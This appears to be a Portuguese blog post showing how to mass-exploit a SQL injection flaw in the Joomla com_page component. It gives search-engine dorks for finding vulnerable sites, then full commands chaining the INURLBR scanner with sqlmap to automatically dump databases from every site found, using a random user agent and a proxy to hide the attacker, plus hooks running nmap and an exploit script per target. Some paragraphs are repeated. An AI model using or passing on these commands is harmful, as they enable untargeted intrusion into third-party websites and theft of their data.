Joomla Component com_page - SQL Injection
Explorando falha SQL componente com_page o diferencial que vamos utilizar 2 ferramentas para otimizar o tempo de analise:
FERRAMENTA -> SCANNER INURLBR
- Baixar: https://github.com/googleinurl/SCANNER-INURLBR
FERRAMENTA -> SQLMAP
- Baixar: https://github.com/sqlmapproject/sqlmap
DORK[1]:
inurl:index.php?option=com_page&id_p=
--------------------------------------------------------------------------------------
DORK[2]:
intext:option=com_page
--------------------------------------------------------------------------------------
Otimizando a busca
Quando usamos dorks temos um trabalho de acessar cada site testar e verificar se está vulnerável, muitas vezes remontar a url alvo.
Umas da utilidade do SCANNER INURLBR é fazer tal processo e otimizar nosso tempo.
Com analise de erros ou valores personalizados podemos identificar se está com erro padrão SQL e executar exploits/scripts externos para extrair mais informações.
Logica de processo:
Umas da utilidade do SCANNER INURLBR é fazer tal processo e otimizar nosso tempo.
Com analise de erros ou valores personalizados podemos identificar se está com erro padrão SQL e executar exploits/scripts externos para extrair mais informações.
Logica de processo:
- BUSCAR ALVOS EM MOTORES DE BUSCA.
- RETIRAR URLS INDESEJADAS.
- RETIRAR DUPLICATAS.
- CONVERTER VALORES EM UM ARRAY DE DADOS.
- ACESSAR ARRAY E PROCESSAR CADA URL INDIVIDUALMENTE.
- ANALISAR ERROS PADRÕES OU PERSONALIZAS.
- SE (OPÇÃO COMAND ESTIVER SETADA SERÁ EXECUTADO UM COMANDO NO TERMINAL)
- ALVOS QUE FOREM ENCONTRADOS ERROS PADRÕES PREDEFINIDOS NO SCRIPT SERÁ SEPARADO EM UM ARQUIVO OUTPUT.
Usando SCANNER INURLBR:
Comando->{
Comando->{
Exmplo:
./inurlbr.php
--dork 'YOUR_DORK'
-s OUTPUT.txt
-q {OP_MOTOR_SEARCH}
--comand-all 'RUN_YOUR_COMMAND_IN_TERMINAL'
Usando:
./inurlbr.php --dork 'inurl:index.php?option=com_page & id_p' -s joomla.txt -q 1,6 --command-all './../../../googleinurl/pentest/sqlmap/sqlmap.py -u "_TARGETFULL_&option=com_page&id_p=8" -p id_p --dbs --time-sec 50 --random-agent --batch --proxy "http://localhost:8118" --dbms=MySQL'
Observação parâmetro --command-all:
Tal parâmetros executa comandos no terminal como próprio nome diz todos vai ser para cada valor encontrado pelo scanner em sua busca.
Pasamanos parâmetros de execução para explorarmos a falha SQLI do componente com uma ferramenta externa SQLMAP,
O script possibilita passar parâmetros como _TARGETFULL_ == URL completa encontrada pelo buscador.
Indo a fundo em --command-*
Pasamanos parâmetros de execução para explorarmos a falha SQLI do componente com uma ferramenta externa SQLMAP,
O script possibilita passar parâmetros como _TARGETFULL_ == URL completa encontrada pelo buscador.
Indo a fundo em --command-*
--command-vul Cada URL vulnerável encontrada irá executar os parâmetros deste comando.
Exemplo: --command-vul {comando}
Uso: --command-vul "nmap sV -p 22,80,21 _TARGET_ '
--command-vul './exploit.sh _TARGET_ output.txt'
--command-all Utilize este comand para especificar um único comando a cada URL encontrado.
Exemplo: --command-all {comando}
Uso: --command-all 'nmap sV -p 22,80,21 _TARGET_'
--command-all './exploit.sh _TARGET_ output.txt'
observação:
_TARGET_ Será substituído pelo URL filtrando somente o domínio.
Ex: www.google.com.br/?q=testeste _TARGET_ = www.google.com.br
Ex: www.google.com.br/?q=testeste _TARGET_ = www.google.com.br
_TARGETFULL_ Será substituído pelo URL / alvo original encontrado.
Ex: www.google.com.br/?q=testeste _TARGETFULL_ = www.google.com.br/?q=testeste
Em nosso caso exploramos uma falha SQL-Injection com SQLMAP.
sqlmap.py -u "_TARGETFULL_&option=com_page&id_p=8" -p id_p --dbs --time-sec 50 --random-agent --batch --proxy "http://localhost:8118" --dbms=MySQL'
RESULTADO:
}
Referencias
Nenhum comentário:
Postar um comentário
............